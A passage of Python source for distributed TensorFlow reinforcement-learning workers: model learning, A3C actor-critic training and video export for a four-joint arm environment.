range(n_parameter_servers):\n if \"ps\" not in spec:\n spec[\"ps\"] = []\n spec[\"ps\"].append(\"localhost:{}\".format(i + port))\n for i in range(n_workers):\n if \"worker\" not in spec:\n spec[\"worker\"] = []\n spec[\"worker\"].append(\"localhost:{}\".format(i + port + n_parameter_servers))\n return tf.train.ClusterSpec(spec)\n\n\ndef is_port_in_use(port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\ndef get_available_port(start_port=6006):\n port = start_port\n while is_port_in_use(port):\n port += 1\n return port\n\n\nclass Worker:\n def __init__(self, task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size):\n self.task_index = task_index\n self.cluster = cluster\n self._n_workers = self.cluster.num_tasks(\"worker\") - 1\n self.job_name = \"worker\"\n self.server = tf.train.Server(cluster, self.job_name, task_index)\n self.name = \"/job:{}/task:{}\".format(self.job_name, task_index)\n self.device = tf.train.replica_device_setter(worker_device=self.name, cluster=cluster)\n self.env = env\n self.discount_factor = discount_factor\n self.sequence_length = sequence_length\n self.reward_params = reward_params\n self.model_lr = model_lr\n self.critic_lr = critic_lr\n self.actor_lr = actor_lr\n self.model_buffer_size = model_buffer_size\n self.pipe = pipe\n self.define_networks()\n self.logdir = logdir\n # graph = tf.get_default_graph() if task_index == 0 else None\n graph = None\n self.summary_writer = tf.summary.FileWriter(self.logdir + \"/worker{}\".format(task_index), graph=graph)\n self.saver = tf.train.Saver()\n self.sess = tf.Session(target=self.server.target)\n if task_index == 0 and len(self.sess.run(tf.report_uninitialized_variables())) > 0: # todo: can be done in Experiment\n self.sess.run(tf.global_variables_initializer())\n print(\"{} variables initialized\".format(self.name))\n\n def get_model_state(self):\n # returns a state from the environment\n raise 
NotImplementedError(\"This method must be overwritten.\")\n\n def get_rl_state(self):\n # returns a state from the environment\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def to_rl_feed_dict(self, **kwargs):\n # transforms the inputs into a feed dict for the actor\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def to_model_feed_dict(self, **kwargs):\n # transforms the inputs into a feed dict for the actor\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_net_dims(self):\n # must define:\n # - self.model_net_dim\n # - self.rl_shared_net_dim\n # - self.actor_remaining_net_dim\n # - self.critic_remaining_net_dim\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_reward(self, **params):\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_networks(self):\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def wait_for_variables_initialization(self):\n while len(self.sess.run(tf.report_uninitialized_variables())) > 0:\n print(\"{} waiting for variable initialization...\".format(self.name))\n time.sleep(1)\n\n def __call__(self):\n cmd = self.pipe.recv()\n while not cmd == \"done\":\n print(\"{} got command {}\".format(self.name, cmd))\n self.__getattribute__(cmd[0])(*cmd[1:])\n cmd = self.pipe.recv()\n\n def save(self, path):\n save_path = self.saver.save(self.sess, path + \"/network.ckpt\")\n self.pipe.send(\"{} saved model to {}\".format(self.name, save_path))\n\n def restore(self, path):\n self.saver.restore(self.sess, os.path.normpath(path + \"/network.ckpt\"))\n self.pipe.send(\"{} variables restored from {}\".format(self.name, path))\n\n def run_reinforcement_learning(self, n_updates, train_actor=True):\n global_rl_step = self.sess.run(self.global_rl_step)\n n_updates += global_rl_step\n while global_rl_step < n_updates - self._n_workers:\n # Collect some experience\n transitions = self.run_n_rl_steps()\n # Update the global networks\n global_rl_step = self.update_reinforcement_learning(*transitions, train_actor=train_actor)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def run_all(self, n_updates, train_actor=True):\n global_rl_step = self.sess.run(self.global_rl_step)\n n_updates += global_rl_step\n while global_rl_step < n_updates - self._n_workers:\n # Collect some experience\n transitions = self.run_n_rl_steps()\n # Update the global networks\n global_rl_step = self.update_all(*transitions, train_actor=train_actor)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def run_display(self, training=True):\n win = viewer.JointAgentWindow(self.discount_factor, return_lookback=50)\n while not self.pipe.poll():\n self.run_n_display_steps(win, training)\n win.close()\n self.pipe.recv() # done\n self.pipe.send(\"{} (display) going IDLE\".format(self.name))\n\n def run_video(self, path, n_sequences, training=True):\n start_index = 0\n with TemporaryDirectory() as tmppath:\n while not os.path.isdir(tmppath):\n time.sleep(0.1)\n for i in range(n_sequences):\n start_index = self.run_n_video_steps(tmppath, start_index, training=training)\n os.system(\"ffmpeg -loglevel panic -r 24 -i {}/frame_%06d.png -vcodec mpeg4 -b 100000 -y {}\".format(tmppath, path))\n self.pipe.send(\"{} saved video under {}\".format(self.name, path))\n\n def save_contact_logs(self, name):\n path = self.logdir + \"/worker{}/contacts_{}.pkl\".format(self.task_index, name)\n 
self.env.save_contact_logs(path)\n self.pipe.send(\"{} saved contact logs under {}\".format(self.name, path))\n\n def run_model(self, n_updates):\n global_model_step = self.sess.run(self.global_model_step)\n n_updates += global_model_step\n while global_model_step < n_updates - self._n_workers:\n # Collect some experience\n states = self.run_n_model_steps()\n # Update the global networks\n global_model_step = self.update_model(states)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def get_action(self):\n state = self.get_rl_state()\n feed_dict = self.to_rl_feed_dict(states=[state])\n action = self.sess.run(self.action_applied_in_env, feed_dict=feed_dict)\n # action, sai, sap = self.sess.run([self.action_applied_in_env, self.stochastic_actions_indices, self.probs], feed_dict=feed_dict)\n # feed_dict[self.actions] = action\n # picked_probs, ai = self.sess.run([self.picked_probs, self.actions_indices], feed_dict=feed_dict)\n # if (sai != ai).any():\n # print(\"{} : \\n{}\\n{}\\n{}\\n{}\\n\".format(self.name, picked_probs[0], sap[0], sai[0], ai[0]))\n # if (picked_probs < 1e-4).any():\n # print(\"{} picked an action with very low probability (<1e-4): \\n{}\\n{}\\n{}\\n{}\\n\".format(self.name, picked_probs[0], sap[0], sai[0], ai[0]))\n return action[0]\n\n def run_n_rl_steps(self):\n model_states = []\n states = []\n actions = []\n for _ in range(self.sequence_length):\n # get action\n action = self.get_action()\n actions.append(action)\n # set action\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get states\n model_states.append(self.get_model_state())\n states.append(self.get_rl_state())\n # run environment step\n self.env.env_step()\n model_states.append(self.get_model_state())\n return model_states, states, actions\n\n def run_n_model_steps(self):\n states = []\n for _ in range(self.sequence_length):\n # get action\n action = self.get_action()\n # run action in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get state\n states.append(self.get_model_state())\n # run environment step\n self.env.env_step()\n return states\n\n # TODO put that function in the subclass\n def run_n_display_steps(self, win, training=True):\n action_return_fetches = [self.action_applied_in_env if training else self.greedy_actions, self.critic_value]\n predicted_positions_reward_fetches = [self.model_outputs, self.rewards]\n args_list = [None] * self.sequence_length\n rewards = np.zeros(self.sequence_length)\n for i in range(self.sequence_length):\n rl_feed_dict = self.to_rl_feed_dict(states=[self.get_rl_state()])\n actions, predicted_returns = self.sess.run(action_return_fetches, feed_dict=rl_feed_dict)\n action = actions[0]\n predicted_return = predicted_returns[0]\n # set positions in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get action and predicted return\n model_states = [self.get_model_state()]\n # get current positions\n current_positions = self.env.discrete_positions\n # get target positions\n target_positions = self.env.discrete_target_positions\n # run action in env\n self.env.env_step()\n # get current vision\n vision = self.env.vision\n # get current positions\n next_positions = self.env.discrete_positions\n # get predicted positions and reward\n model_states.append(self.get_model_state())\n model_feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n predicted_positions, 
current_rewards = self.sess.run(predicted_positions_reward_fetches, feed_dict=model_feed_dict)\n current_reward = current_rewards[0]\n predicted_positions = predicted_positions[0].reshape((4, -1))\n # display\n args = [\n vision,\n current_positions,\n target_positions,\n predicted_positions,\n next_positions,\n current_reward,\n predicted_return]\n args_list[i] = args\n rewards[i] = current_reward\n win(*args)\n indices = np.argsort(rewards) #[-self.sequence_length // 10:]\n # for args in args_list:\n # win(*args)\n # for i in indices:\n # if i != 0:\n # win(*args_list[i - 1])\n # win(*args_list[i])\n\n def run_n_video_steps(self, path, start_index, training=True):\n action_fetches = self.action_applied_in_env if training else self.greedy_actions\n for i in range(self.sequence_length):\n rl_feed_dict = self.to_rl_feed_dict(states=[self.get_rl_state()])\n actions = self.sess.run(action_fetches, feed_dict=rl_feed_dict)\n action = actions[0]\n # set positions in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # run action in env\n self.env.env_step()\n # get current vision\n vision = self.env.vision\n # save\n data = vision.reshape(vision.shape[0], -1)\n png.from_array(data, \"RGB\").save(path + \"/frame_{:06d}.png\".format(start_index + i))\n return start_index + i + 1\n\n def rewards_to_return(self, rewards, prev_return=0):\n returns = np.zeros_like(rewards)\n for i in range(len(rewards) - 1, -1, -1):\n r = rewards[i]\n prev_return = r + self.discount_factor * prev_return\n returns[i] = prev_return\n return returns\n\n def update_reinforcement_learning(self, model_states, rl_states, actions, train_actor=True):\n feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n rewards, model_summary = self.sess.run([self.rewards, self.model_summary_at_rl], feed_dict=feed_dict)\n feed_dict = self.to_rl_feed_dict(states=rl_states, actions=actions, rewards=rewards)\n train_op = self.rl_train_op if train_actor else self.critic_train_op\n fetches = [self.actor_loss, self.critic_loss, self.global_rl_step_inc, train_op, self.rl_summary]\n aloss, closs, global_rl_step, _, rl_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n self.summary_writer.add_summary(rl_summary, global_step=global_rl_step)\n if global_rl_step % 100 <= self._n_workers:\n self.summary_writer.flush()\n print(\"{} finished update number {} (actor loss = {:.3f} critic loss = {:.3f})\".format(\n self.name, global_rl_step, aloss, closs))\n return global_rl_step\n\n def update_model(self, states):\n self.model_buffer.incorporate(states[:-1], states[1:])\n states, next_states = self.model_buffer.batch(len(states) - 1)\n feed_dict = self.to_model_feed_dict(states=states, next_states=next_states)\n fetches = [self.model_loss, self.global_model_step_inc, self.model_train_op, self.model_summary]\n loss, global_model_step, _, model_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_model_step)\n if global_model_step % 100 <= self._n_workers:\n self.summary_writer.flush()\n print(\"{} finished update number {} (loss = {:.3f})\".format(self.name, global_model_step, loss))\n return global_model_step\n\n def update_all(self, model_states, rl_states, actions, train_actor=True):\n # train model with buffered data\n self.model_buffer.incorporate(model_states[:-1], model_states[1:])\n states, next_states = 
self.model_buffer.batch(len(model_states) - 1)\n        fetches = [self.model_train_op, self.model_summary, self.global_rl_step]\n        feed_dict = self.to_model_feed_dict(states=states, next_states=next_states)\n        _, model_summary, global_rl_step = self.sess.run(fetches, feed_dict=feed_dict)\n        self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n        # record reward / model loss at rl time\n        feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n        fetches = [self.rewards, self.model_loss, self.model_summary_at_rl]\n        rewards, mloss, model_summary = self.sess.run(fetches, feed_dict=feed_dict)\n        self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n        feed_dict = self.to_rl_feed_dict(states=rl_states, actions=actions, rewards=rewards)\n        train_op = self.rl_train_op if train_actor else self.critic_train_op\n        fetches = [self.actor_loss, self.critic_loss, self.global_rl_step_inc, train_op, self.rl_summary]\n        aloss, closs, global_rl_step_inc, _, rl_summary = self.sess.run(fetches, feed_dict=feed_dict)\n        self.summary_writer.add_summary(rl_summary, global_step=global_rl_step)\n        if global_rl_step % 100 <= self._n_workers:\n            self.summary_writer.flush()\n        print(\"{} finished update number {} (model loss = {:.3f} critic loss = {:.3f})\".format(\n            self.name, global_rl_step, mloss, closs))\n        return global_rl_step\n\n\nclass JointAgentWorker(Worker):\n    def define_networks(self):\n        self.define_net_dims()\n        self.define_replay_buffer()\n        with tf.device(self.device):\n            # define model\n            self.define_model()\n            # define reinforcement learning\n            self.define_reinforcement_learning()\n\n    def define_net_dims(self):\n        self.define_model_net_dim()\n        self.define_rl_net_dim()\n\n    def define_model_net_dim(self):\n        raise NotImplementedError(\"This method must be overwritten\")\n\n    def define_rl_net_dim(self):\n        raise NotImplementedError(\"This method must be overwritten\")\n\n    def define_replay_buffer(self):\n        self.model_buffer = Buffer(shape=(3, 4, self.n_discrete), size=self.model_buffer_size)\n\n    def get_model_state(self):\n        return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n    def get_rl_state(self):\n        return self.env.discrete_positions, self.env.discrete_speeds\n\n    def to_rl_feed_dict(self, states=None, actions=None, rewards=None):\n        # transforms the inputs into a feed dict for the actor\n        feed_dict = {}\n        if states is not None:\n            np_rl_states = np.array(states)\n            new_shape = (-1, np.prod(np_rl_states.shape[1:]))\n            feed_dict[self.rl_inputs] = np.reshape(np_rl_states, new_shape)\n        if actions is not None:\n            np_actions = np.array(actions)\n            feed_dict[self.actions] = np_actions\n        if rewards is not None:\n            # reverse pass through the rewards here...\n            returns = self.rewards_to_return(rewards)\n            feed_dict[self.return_targets_not_bootstraped] = returns\n        return feed_dict\n\n    def to_model_feed_dict(self, states, next_states=None):\n        feed_dict = {}\n        np_states = np.array(states)\n        feed_dict[self.model_inputs] = np_states\n        if next_states is not None:\n            feed_dict[self.model_targets] = np.array(next_states)[:, 0]\n        return feed_dict\n\n\nclass PEJointAgentWorker(JointAgentWorker):\n    def define_model_net_dim(self):\n        self.n_discrete = self.env._n_discrete\n        self.model_net_dim = [self.n_discrete * 3 * 4, 600, 600, 600, self.n_discrete]\n\n    def define_model(self):\n        #############################\n        # MUST DEFINE : #############\n        #############################\n        # self.model_outputs\n        # self.rewards\n        # self.model_loss\n        # 
self.model_losses\n # self.global_model_step\n # self.model_train_op\n # self.model_summary\n # self.model_summary_at_rl_time --> missing in current ipl, TODO --> useless ?\n # PLACEHOLDERS : ############\n # self.model_inputs\n # self.model_targets\n #############################\n net_dim = self.model_net_dim\n self.model_inputs = tf.placeholder(shape=[None, 3, 4, self.n_discrete], dtype=tf.float32, name=\"model_inputs\")\n self.model_targets = tf.placeholder(shape=[None, 4, self.n_discrete], dtype=tf.float32, name=\"model_targets\")\n splited_model_inputs = [tf.reshape(x, (-1, 3 * self.n_discrete)) for x in tf.unstack(self.model_inputs, 4, axis=2)]\n splited_model_targets = tf.unstack(self.model_targets, 4, axis=1)\n splited_model_outputs = []\n with tf.variable_scope(\"model\"):\n for joint_id, inp in enumerate(splited_model_inputs):\n prev_layer = inp\n for i, d in enumerate(net_dim[1:]):\n activation_fn = lrelu if i < len(net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n splited_model_outputs.append(prev_layer)\n self.model_outputs = tf.stack(splited_model_outputs, axis=1)\n self.model_losses = tf.reduce_mean((self.model_outputs - self.model_targets) ** 2, axis=[-2, -1])\n self.model_loss = tf.reduce_mean(self.model_losses, name=\"loss\")\n self.define_reward(**self.reward_params)\n self.global_model_step = tf.Variable(0, dtype=tf.int32)\n self.global_model_step_inc = self.global_model_step.assign_add(1)\n # optimizer / summary\n self.model_optimizer = tf.train.AdamOptimizer(self.model_lr)\n self.model_train_op = self.model_optimizer.minimize(self.model_loss)\n sum_model_loss = tf.summary.scalar(\"/model/loss\", self.model_losses[0])\n sum_model_reward = tf.summary.scalar(\"/model/reward\", self.rewards[0])\n self.model_summary = tf.summary.merge([sum_model_loss, sum_model_reward])\n sum_model_loss_at_rl = tf.summary.scalar(\"/rl/loss\", self.model_losses[0])\n sum_model_reward_at_rl = tf.summary.scalar(\"/rl/reward\", self.rewards[0])\n self.model_summary_at_rl = tf.summary.merge([sum_model_loss_at_rl, sum_model_reward_at_rl])\n\n\nclass A3CJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4]\n self.critic_remaining_net_dim = [600, 1]\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n constant_gammas = tf.fill(dims=[batch_size], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n prev_layer = self.rl_inputs\n with tf.variable_scope(\"shared\"):\n for i, d in 
enumerate(self.rl_shared_net_dim[1:]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=lrelu)\n fork_layer = prev_layer\n with tf.variable_scope(\"private_to_critic\"):\n for i, d in enumerate(self.critic_remaining_net_dim):\n activation_fn = lrelu if i < len(self.critic_remaining_net_dim) - 1 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n self.return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * tf.stop_gradient(self.critic_value[-1])\n self.critic_losses = (self.critic_value - self.return_targets) ** 2\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n self.actions = tf.placeholder(shape=[None, self.actor_remaining_net_dim[-1]], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n self.actor_targets = self.return_targets - tf.stop_gradient(self.critic_value)\n targets = tf.expand_dims(self.actor_targets, -1)\n prev_layer = fork_layer\n with tf.variable_scope(\"private_to_actor\"):\n for i, d in enumerate(self.actor_remaining_net_dim[:-1]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i))\n self.greedy_actions = tl.fully_connected(prev_layer, self.actor_remaining_net_dim[-1], activation_fn=None, scope=\"mean_actions\")\n self.log_sigma_2 = tl.fully_connected(prev_layer, self.actor_remaining_net_dim[-1], activation_fn=None, scope=\"log_variance_actions\")\n self.sigma_2 = tf.exp(self.log_sigma_2) + 0.01\n self.sigma = tf.exp(0.5 * self.log_sigma_2) + 0.1\n self.stochastic_actions = tf.random_normal(shape=tf.shape(self.greedy_actions)) * self.sigma + self.greedy_actions\n self.action_applied_in_env = self.stochastic_actions\n self.probs = 1 / (tf.sqrt(2 * pi * self.sigma_2)) * tf.exp(-(self.actions - self.greedy_actions) ** 2 / (2 * self.sigma_2))\n self.log_probs = -0.5 * (log(2 * pi) + self.log_sigma_2 + (self.actions - self.greedy_actions) ** 2 / (self.sigma_2))\n self.entropy = 0.5 * (1 + log(2 * pi) + self.log_sigma_2)\n self.entropy_mean = tf.reduce_mean(self.entropy, name=\"entropy_mean\")\n # self.actor_losses = -self.log_probs * targets - self.entropy_coef * self.entropy\n self.actor_losses = -self.log_probs * targets\n self.actor_loss = tf.reduce_sum(self.actor_losses, name=\"loss\")\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n self.critic_optimizer = tf.train.AdamOptimizer(5e-4)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = self.critic_optimizer.minimize(self.critic_loss)\n self.rl_optimizer = tf.train.AdamOptimizer(5e-4)\n self.rl_train_op = self.rl_optimizer.minimize(0.000001 * self.actor_loss + self.critic_loss)\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n mean_summaries, std_summaries = [], []\n for i, name in zip(range(4), names):\n mean_summary = tf.summary.scalar(\"joints/{}_mean\".format(name), self.greedy_actions[0, i])\n mean_summaries.append(mean_summary)\n std_summary = tf.summary.scalar(\"joints/{}_std\".format(name), self.sigma[0, i])\n std_summaries.append(std_summary)\n per_joint_summaries = mean_summaries + std_summaries\n actor_loss_summary = tf.summary.scalar(\"/rl/actor_loss\", tf.reduce_mean(self.actor_losses))\n critic_loss_summary = tf.summary.scalar(\"/rl/critic_loss\", 
self.critic_losses[0])\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((self.return_targets - tf.reduce_mean(self.return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n self.rl_summary = tf.summary.merge([\n actor_loss_summary,\n critic_loss_summary,\n sum_critic_quality] + per_joint_summaries)\n\n\nclass DiscreteA3CJointAgentWorker(JointAgentWorker):\n def __init__(self, task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size, entropy_coef):\n self.entropy_coef = entropy_coef\n super().__init__(task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size)\n\n\n def define_rl_net_dim(self):\n self.n_actions = 30\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4 * self.n_actions]\n self.critic_remaining_net_dim = [600, 1]\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n batch_size_64 = tf.cast(batch_size, tf.int64)\n constant_gammas = tf.fill(dims=[batch_size], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n prev_layer = self.rl_inputs\n with tf.variable_scope(\"shared\"):\n for i, d in enumerate(self.rl_shared_net_dim[1:]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=lrelu)\n fork_layer = prev_layer\n with tf.variable_scope(\"private_to_critic\"):\n for i, d in enumerate(self.critic_remaining_net_dim):\n activation_fn = lrelu if i < len(self.critic_remaining_net_dim) - 1 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n self.return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * tf.stop_gradient(self.critic_value[-1])\n self.critic_losses = (self.critic_value - self.return_targets) ** 2\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n bounds = np.array([2.34, 2.34, 3.14, 3.14], dtype=np.float32)\n vals = [tf.linspace(-b, b, self.n_actions) for b in bounds]\n action_values = tf.stack(vals, axis=0)\n self.actions = tf.placeholder(shape=[None, 4], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n b = tf.constant(bounds)\n self.actions_indices = tf.cast(tf.floor(((self.actions + b) / (2 * b)) * (self.n_actions - 1) + 0.5), tf.int32)\n self.actor_targets = self.return_targets - tf.stop_gradient(self.critic_value)\n targets = 
tf.expand_dims(self.actor_targets, -1)\n prev_layer = fork_layer\n with tf.variable_scope(\"private_to_actor\"):\n for i, d in enumerate(self.actor_remaining_net_dim):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i))\n\n self.logits = tf.reshape(prev_layer, (-1, 4, self.n_actions)) # [BS, 4, NA]\n # self.logits = 1000 * tf.tanh(self.logits / 1000)\n # self.probs = tf.nn.softmax(self.logits, axis=-1) + 1 / (20 * self.n_actions) # [BS, 4, NA]\n # self.dist = tf.distributions.Categorical(probs=self.probs)\n self.dist = tf.distributions.Categorical(logits=self.logits)\n self.log_picked_probs = self.dist.log_prob(self.actions_indices) # [BS, 4]\n self.picked_probs = self.dist.prob(self.actions_indices) # [BS, 4]\n self.greedy_actions_indices = tf.argmax(self.logits, axis=-1) # [BS, 4]\n self.greedy_actions = tf.cast(self.greedy_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds\n self.stochastic_actions_indices = self.dist.sample()\n self.stochastic_actions = tf.cast(self.stochastic_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds # [BS, 4]\n\n self.action_applied_in_env = self.stochastic_actions\n self.entropy = self.dist.entropy()\n self.entropy_mean = tf.reduce_mean(self.entropy, name=\"entropy_mean\")\n # self.entropy_coef = 0.01\n self.actor_losses = -tf.maximum(self.log_picked_probs, -4) * targets - self.entropy_coef * self.entropy\n self.actor_loss = tf.reduce_sum(self.actor_losses, name=\"loss\")\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n self.critic_optimizer = tf.train.AdamOptimizer(self.critic_lr)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = self.critic_optimizer.minimize(self.critic_loss)\n self.rl_optimizer = tf.train.AdamOptimizer(self.actor_lr)\n self.rl_train_op = self.rl_optimizer.minimize(self.actor_loss + self.critic_loss)\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n pos_summaries, prob_summaries = [], []\n for i, name in zip(range(4), names):\n pos_summary = tf.summary.scalar(\"joints/{}_pos\".format(name), self.stochastic_actions[0, i])\n pos_summaries.append(pos_summary)\n prob_summary = tf.summary.scalar(\"joints/{}_prob\".format(name), self.picked_probs[0, i])\n prob_summaries.append(prob_summary)\n per_joint_summaries = pos_summaries + prob_summaries\n max_logits_summary = tf.summary.scalar(\"/rl/max_logits\", tf.reduce_max(self.logits))\n entropy_summary = tf.summary.scalar(\"/rl/entropy\", self.entropy_mean)\n actor_loss_summary = tf.summary.scalar(\"/rl/actor_loss\", tf.reduce_mean(self.actor_losses))\n critic_loss_summary = tf.summary.scalar(\"/rl/critic_loss\", self.critic_losses[0])\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((self.return_targets - tf.reduce_mean(self.return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n self.rl_summary = tf.summary.merge([\n max_logits_summary,\n entropy_summary,\n actor_loss_summary,\n critic_loss_summary,\n sum_critic_quality] + per_joint_summaries)\n\n\nclass DiscreteRandomJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.n_actions = 30\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4 * self.n_actions]\n self.critic_remaining_net_dim = [600, 1]\n\n def 
get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n bounds = np.array([2.34, 2.34, 3.14, 3.14], dtype=np.float32)\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n self.critic_value = tf.zeros_like(self.return_targets_not_bootstraped)\n self.critic_losses = tf.zeros_like(self.return_targets_not_bootstraped)\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n self.actions = tf.placeholder(shape=[None, 4], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n # self.dist = tf.distributions.Categorical(probs=tf.constant([[[1.0] * self.n_actions] * 4]))\n self.dist = tf.distributions.Categorical(probs=tf.ones(shape=[batch_size, 4, self.n_actions], dtype=tf.float32))\n self.stochastic_actions_indices = self.dist.sample()\n self.stochastic_actions = tf.cast(self.stochastic_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds # [BS, 4]\n self.greedy_actions = self.stochastic_actions\n self.action_applied_in_env = self.stochastic_actions\n self.actor_loss = tf.constant(0.0)\n self.critic_loss = tf.constant(0.0)\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = tf.no_op()\n self.rl_train_op = tf.no_op()\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", 